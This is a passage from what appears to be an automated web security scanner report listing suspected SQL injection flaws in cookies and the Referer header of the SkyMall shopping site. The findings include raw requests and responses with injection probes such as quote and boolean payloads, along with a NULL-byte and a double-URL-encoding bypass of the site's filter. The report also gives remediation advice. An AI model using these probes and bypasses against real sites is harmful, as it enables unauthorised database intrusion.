Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:24 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:41:24 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:41:24 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497684228~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:41:24 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.13. http://www.skymall.com/shopping/dept.htm [source cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The source cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E'; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:39:33 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E''; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:39:34 GMT
Connection: close
Set-Cookie: JSESSIONID=A53901A3614D3B36F024541E49662E40.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:39:34 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497574000~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:39:34 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.14. http://www.skymall.com/shopping/detail.htm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/detail.htm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shopping/detail.htm?pid=203458153&c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152%20and%201%3d1--%20; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496224477; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494424475&t4=1303494352911&lti=1303494424474&ln=Log%20Racks&hr=/shopping/detail.htm%3Fpid%3D203458153%26c%3D10500%26cm_sp%3DFeaturedProduct-_-DeptPage-_-Log%20Racks&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:29:53 GMT
Connection: close
Set-Cookie: JSESSIONID=D891A6A4F3C72232936DBC22695747D4.plutov5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:29:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:29:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:29:53 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:29:53 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303496992825~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:29:53 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 18:29:53 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:29:53 GMT
Content-Length: 191817




<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->

<!--searchengine code start-->
<!--searchengine code end-->
<!--ssl start-->
<!--ssl end-->
<html>
   <head>
       <!-- mp_trans_disable_start --><title>Log Racks | Outdoor Living | SkyMall</title><!-- mp_trans_disable_end -->
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <meta content="skymall.com name=author">
       <meta content="Copyright &copy; 2011 SkyMall, Inc. All right reserved." name="copyright">
       <meta content="www.objectinnovation.com" name="designer">
       <!-- mp_trans_disable_start -->
       <meta content="online shopping, shopping, gifts, catalog sales" name="classification">
       <meta content="LOG, RACKS, GIMP376, IMPROVEMENTS" name="keywords">
       <meta content="Log Racks from Improvements: Find Log Racks at SkyMall: " name="description">
       <!-- mp_trans_disable_end -->
       <link rel="stylesheet" type="text/css" href="/shopping/styles/styles.css">
       <link rel="stylesheet" type="text/css" href="/shopping/styles/TopNavMenuStyle.css">
       <link rel="stylesheet" type="text/css" href="/shopping/styles/AutoComplete.css">
       <script type="text/javascript" language="javascript" src="
...[SNIP]...

Request 2

GET /shopping/detail.htm?pid=203458153&c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152%20and%201%3d2--%20; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496224477; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494424475&t4=1303494352911&lti=1303494424474&ln=Log%20Racks&hr=/shopping/detail.htm%3Fpid%3D203458153%26c%3D10500%26cm_sp%3DFeaturedProduct-_-DeptPage-_-Log%20Racks&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:29:54 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1"><tr valign="top" bgcolor="#FBFFDF"align="Left"><td><STRONG>Error</STRONG></td></tr><tr valign="top" bgcolor="#FFFFFF"><td>This page can't be displayed due to a security violation. Contact support for additional information.<br>The incident ID is: 2759180419420659284.</td></tr></table></td></tr></table></body></html>

1.15. http://www.skymall.com/shopping/subdept.htm [90043274_clogin cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The 90043274_clogin cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 90043274_clogin cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997%00'; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:28:27 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997%00''; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:28:30 GMT
Connection: close
Set-Cookie: JSESSIONID=522DC8A4328BFB637085A244C410CCA2.menthuv5web; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:28:27 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:28:27 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:28:30 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:28:30 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303496907321~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:28:30 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:28:30 GMT
Content-Length: 212901


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.16. http://www.skymall.com/shopping/subdept.htm [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:32:52 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:32:54 GMT
Connection: close
Set-Cookie: JSESSIONID=7563D932BE75027B53B90871E12DC86C.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:32:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:32:52 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:32:54 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:32:54 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497172977~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:32:54 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:32:54 GMT
Content-Length: 212904


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.17. http://www.skymall.com/shopping/subdept.htm [partner cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/subdept.htm

Issue detail

The partner cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the partner cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the partner cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING%2527; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:25:33 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/subdept.htm?c=102961916 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/dept.htm?c=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
